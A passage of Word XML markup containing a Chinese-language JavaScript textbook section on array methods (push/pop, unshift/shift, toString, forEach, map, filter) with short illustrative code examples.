      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>pop()</w:t>
      </w:r>
      <w:r>
        <w:t>方法允许将数组当做栈来使用。</w:t>
      </w:r>
      <w:r>
        <w:t>push()</w:t>
      </w:r>
      <w:r>
        <w:t>方法在数组的尾部添加一个或多个元素，并返回数组新的长度。</w:t>
      </w:r>
      <w:r>
        <w:t>pop()</w:t>
      </w:r>
      <w:r>
        <w:t>方法则相反：它删除数组的最后一个元素，减小数组长度并返回它删除的值。注意，两个方法都修改并替换原始数组而非生成一个修改版的新数组。组合使用</w:t>
      </w:r>
      <w:r>
        <w:t>push()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>pop()</w:t>
      </w:r>
      <w:r>
        <w:t>能够用</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>数组实现先进后出的栈。例如：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var stack=[];//stack:[]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>stack.push(1,2);//stack:[1,2]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　返回</w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>stack.pop();//sta</w:t>
      </w:r>
      <w:r>
        <w:t>ck:[1]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　返回</w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>stack.push(3);//stack:[1,3]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　返回</w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>stack.pop();//stack:[1]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　返回</w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>stack.push([4,5]);//stack:[1,[4,5]]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　返回</w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>stack.pop()//stack:[1]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　返回</w:t>
      </w:r>
      <w:r>
        <w:t>[4,5]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>stack.pop();//stack:[]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　返回</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="178" w:name="7_8_8_unshift__He_shift__"/>
      <w:r>
        <w:t>7.8.8</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:t>unshift()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>shift()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="178"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>unshift()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>shift()</w:t>
      </w:r>
      <w:r>
        <w:t>方法的行为非常类似于</w:t>
      </w:r>
      <w:r>
        <w:t>push()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>pop()</w:t>
      </w:r>
      <w:r>
        <w:t>，不一样的是前者是在数组的头部而非尾部进行元素</w:t>
      </w:r>
      <w:r>
        <w:t>的插入和删除操作。</w:t>
      </w:r>
      <w:r>
        <w:t>unshift()</w:t>
      </w:r>
      <w:r>
        <w:t>在数组的头部添加一个或多个元素，并将已存在的元素移动到更高索引的位置来获得足够的空间，最后返回数组新的长度。</w:t>
      </w:r>
      <w:r>
        <w:t>shift()</w:t>
      </w:r>
      <w:r>
        <w:t>删除数组的第一个元素并将其返回，然后把所有随后的元素下移一个位置来填补数组头部的空缺。例如：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var a=[];//a:[]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>a.unshift(1);//a:[1]</w:t>
      </w:r>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
      <w:r>
        <w:t>:1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>a.unshift(22);//a:[22,1]</w:t>
      </w:r>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
      <w:r>
        <w:t>:2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>a.shift();//a:[1]</w:t>
      </w:r>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
      <w:r>
        <w:t>:22</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>a.unshift(3,[4,5]);//a:[3,[4,5],1]</w:t>
      </w:r>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
      <w:r>
        <w:t>:3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>a.shift();//a:[[4,5],1]</w:t>
      </w:r>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
      <w:r>
        <w:t>:3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>a.shift();//a:[1]</w:t>
      </w:r>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
      <w:r>
        <w:t>:[4,5]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>a.shift();//a:[]</w:t>
      </w:r>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
      <w:r>
        <w:t>:1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>注意，当使用多个参数调用</w:t>
      </w:r>
      <w:r>
        <w:t>unshift()</w:t>
      </w:r>
      <w:r>
        <w:t>时它的行为令人惊讶。参数是一次性插入的（就像</w:t>
      </w:r>
      <w:r>
        <w:t>splice()</w:t>
      </w:r>
      <w:r>
        <w:t>方法）而非一次一个地插入。这意味着最终的数组中插入的元素的顺序和它们在参数列表中的顺序一致。而假如元素是一次一个地插入，它们的顺序应该是反过来的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="179" w:name="7_8_9_toString__He_toLocaleString__"/>
      <w:r>
        <w:t>7.8.9</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:t>toString()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>toLocaleString()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="179"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>数组和其他</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>对象一样拥有</w:t>
      </w:r>
      <w:r>
        <w:t>toString()</w:t>
      </w:r>
      <w:r>
        <w:t>方法。针对数组，该方法将其每个元素转化为字符串（如有必要将调用元素的</w:t>
      </w:r>
      <w:r>
        <w:t>toString()</w:t>
      </w:r>
      <w:r>
        <w:t>方法）并且输出用逗号分隔的字符串列表。注意，输出不包括方括号或其他任何形式的包裹数组值的分隔符。例如：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>[1,2,3].toString()//</w:t>
      </w:r>
      <w:r>
        <w:t>生成</w:t>
      </w:r>
      <w:r>
        <w:t>'1,2,3'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>["a","b","c"].toString()//</w:t>
      </w:r>
      <w:r>
        <w:t>生成</w:t>
      </w:r>
      <w:r>
        <w:t>'a,b,c'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>[1,[2,'c']].toString()//</w:t>
      </w:r>
      <w:r>
        <w:t>生成</w:t>
      </w:r>
      <w:r>
        <w:t>'1,2,c'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>注意，这里与不使用</w:t>
      </w:r>
      <w:r>
        <w:t>任何参数调用</w:t>
      </w:r>
      <w:r>
        <w:t>join()</w:t>
      </w:r>
      <w:r>
        <w:t>方法返回的字符串是一样的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>toLocaleString()</w:t>
      </w:r>
      <w:r>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:t>toString()</w:t>
      </w:r>
      <w:r>
        <w:t>方法的本地化版本。它调用元素的</w:t>
      </w:r>
      <w:r>
        <w:t>toLocaleString()</w:t>
      </w:r>
      <w:r>
        <w:t>方法将每个数组元素转化为字符串，并且使用本地化（和自定义实现的）分隔符将这些字符串连接起来生成最终的字符串。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="180" w:name="7_9_ECMAScript_5Zhong_De_Shu_Zu_Fang_Fa_"/>
      <w:r>
        <w:t>7.9</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript 5</w:t>
      </w:r>
      <w:r>
        <w:t>中的数组方法</w:t>
      </w:r>
      <w:bookmarkEnd w:id="180"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>ECMAScript 5</w:t>
      </w:r>
      <w:r>
        <w:t>定义了</w:t>
      </w:r>
      <w:r>
        <w:t>9</w:t>
      </w:r>
      <w:r>
        <w:t>个新的数组方法来遍历、映射、过滤、检测、简化和搜索数组。下面几节描述了这些方法。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>但在开始详细介绍之前，很有必要对</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript 5</w:t>
      </w:r>
      <w:r>
        <w:t>中的数组方法做一个</w:t>
      </w:r>
      <w:r>
        <w:t>概述。首先，大多数方法的第一个参数接收一个函数，并且对数组的每个元素（或一些元素）调用一次该函数。如果是稀疏数组，对不存在的元素不调用传递的函数。在大多数情况下，调用提供的函数使用三个参数：数组元素、元素的索引和数组本身。通常，只需要第一个参数值，可以忽略后两个参数。大多数</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript 5</w:t>
      </w:r>
      <w:r>
        <w:t>数组方法的第一个参数是一个函数，第二个参数是可选的。如果有第二个参数，则调用的函数被看做是第二个参数的方法。也就</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>是说，在调用函数时传递进去的第二个参数作为它的</w:t>
      </w:r>
      <w:r>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:t>关键字的值来使用。被调用的函数的返回值非常重要，</w:t>
      </w:r>
      <w:r>
        <w:t>但是不同的方法处理返回值的方式也不一样。</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript 5</w:t>
      </w:r>
      <w:r>
        <w:t>中的数组方法都不会修改它们调用的原始数组。当然，传递给这些方法的函数是可以修改这些数组的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="181" w:name="7_9_1_forEach__"/>
      <w:r>
        <w:t>7.9.1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:t>forEach()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="181"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>forEach()</w:t>
      </w:r>
      <w:r>
        <w:t>方法从头至尾遍历数组，为每个元素调用指定的函数。如上所述，传递的函数作为</w:t>
      </w:r>
      <w:r>
        <w:t>forEach()</w:t>
      </w:r>
      <w:r>
        <w:t>的第一个参数。然后</w:t>
      </w:r>
      <w:r>
        <w:t>forEach()</w:t>
      </w:r>
      <w:r>
        <w:t>使用三个参数调用该函数：数组元素、元素的索引和数组本身。如果只关心数组元素的值，可以编写只有一个参数的函数</w:t>
      </w:r>
      <w:r>
        <w:t>——</w:t>
      </w:r>
      <w:r>
        <w:t>额外的参数将忽略：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var data=[1,2,3,4,5];//</w:t>
      </w:r>
      <w:r>
        <w:t>要</w:t>
      </w:r>
      <w:r>
        <w:t>求和的数组</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>计算数组元素的和值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var sum=0;//</w:t>
      </w:r>
      <w:r>
        <w:t>初始为</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>data.forEach(function(value){sum+=value;});//</w:t>
      </w:r>
      <w:r>
        <w:t>将每个值累加到</w:t>
      </w:r>
      <w:r>
        <w:t>sum</w:t>
      </w:r>
      <w:r>
        <w:t>上</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>sum//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>15//</w:t>
      </w:r>
      <w:r>
        <w:t>每个数组元素的值自加</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>data.forEach(function(v,i,a){a[i]=v+1;});</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>data//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>[2,3,4,5,6]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>注意，</w:t>
      </w:r>
      <w:r>
        <w:t>forEach()</w:t>
      </w:r>
      <w:r>
        <w:t>无法在所有元素都传递给调用的函数之前终止遍历。也就是说，没有像</w:t>
      </w:r>
      <w:r>
        <w:t>for</w:t>
      </w:r>
      <w:r>
        <w:t>循环中使用的相应的</w:t>
      </w:r>
      <w:r>
        <w:t>break</w:t>
      </w:r>
      <w:r>
        <w:t>语句。如</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>果要提前终止，必须把</w:t>
      </w:r>
      <w:r>
        <w:t>forEach()</w:t>
      </w:r>
      <w:r>
        <w:t>方法放在一个</w:t>
      </w:r>
      <w:r>
        <w:t>try</w:t>
      </w:r>
      <w:r>
        <w:t>块中，并能抛出一个异常。如果</w:t>
      </w:r>
      <w:r>
        <w:t>forEach()</w:t>
      </w:r>
      <w:r>
        <w:t>调用的函数抛出</w:t>
      </w:r>
      <w:r>
        <w:t>foreach.break</w:t>
      </w:r>
      <w:r>
        <w:t>异常，循环会提前终止：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function foreach(a,f,t){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>try{a.forEach(f,t);}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>catch(e){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(e===foreach.break)return;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>else throw e;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>forea</w:t>
      </w:r>
      <w:r>
        <w:t>ch.break=new Error("StopIteration");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="182" w:name="7_9_2_map__"/>
      <w:r>
        <w:t>7.9.2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:t>map()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="182"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>map()</w:t>
      </w:r>
      <w:r>
        <w:t>方法将调用的数组的每个元素传递给指定的函数，并返回一个数组，它包含该函数的返回值。例如：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>a=[1,2,3];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>b=a.map(function(x){return x*x;});//b</w:t>
      </w:r>
      <w:r>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:t>[1,4,9]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>传递给</w:t>
      </w:r>
      <w:r>
        <w:t>map()</w:t>
      </w:r>
      <w:r>
        <w:t>的函数的调用方式和传递给</w:t>
      </w:r>
      <w:r>
        <w:t>forEach()</w:t>
      </w:r>
      <w:r>
        <w:t>的函数的调用方式一样。但传递给</w:t>
      </w:r>
      <w:r>
        <w:t>map()</w:t>
      </w:r>
      <w:r>
        <w:t>的函数应该有返回值。注意，</w:t>
      </w:r>
      <w:r>
        <w:t>map()</w:t>
      </w:r>
      <w:r>
        <w:t>返</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>回的是新数组：它不修改调用的数组。如果是稀疏数组，返回的也</w:t>
      </w:r>
      <w:r>
        <w:t>是相同方式的稀疏数组：它具有相同的长度，相同的缺失元素。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="183" w:name="7_9_3_filter__"/>
      <w:r>
        <w:t>7.9.3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:t>filter()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="183"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>fliter()</w:t>
      </w:r>
      <w:r>
        <w:t>方法返回的数组元素是调用的数组的一个子集。传递的函数是用来逻辑判定的：该函数返回</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>。调用判定函数就像调用</w:t>
      </w:r>
      <w:r>
        <w:t>forEach()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>map()</w:t>
      </w:r>
      <w:r>
        <w:t>一样。如果返回值为</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>或能转化为</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>的值，那么传递给判定函数的元素就是这个子集的成员，它将被添加到一个作为返回值的数组中。例如：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>a=[5,4,3,2,1];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>smallvalues=a.filter(function(x){return x</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>});//[2,1]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
